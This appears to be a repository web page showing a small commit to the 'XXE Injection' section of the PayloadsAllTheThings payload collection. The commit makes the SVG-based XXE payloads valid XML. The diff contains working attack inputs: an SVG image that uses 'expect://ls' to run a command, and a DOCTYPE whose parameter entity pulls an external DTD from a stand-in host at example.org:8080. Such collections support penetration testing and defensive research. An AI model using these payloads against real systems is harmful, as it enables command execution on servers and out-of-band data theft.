Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

improved XXE SVG payloads to be valid XMLs

Browse source
This commit is contained in:
gregxsunday 2021-04-24 14:45:45 +02:00
parent 08b59f2856
commit 43a9a5d235
1 changed files with 2 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
XXE Injection/README.md
View file

@ -419,7 +419,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
```xml ```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image> <image xlink:href="expect://ls" width="200" height="200"></image>
</svg> </svg>
``` ```
@ -438,6 +438,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
*xxe.svg* *xxe.svg*
```xml ```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [ <!DOCTYPE svg [
<!ELEMENT svg ANY > <!ELEMENT svg ANY >
<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml"> <!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">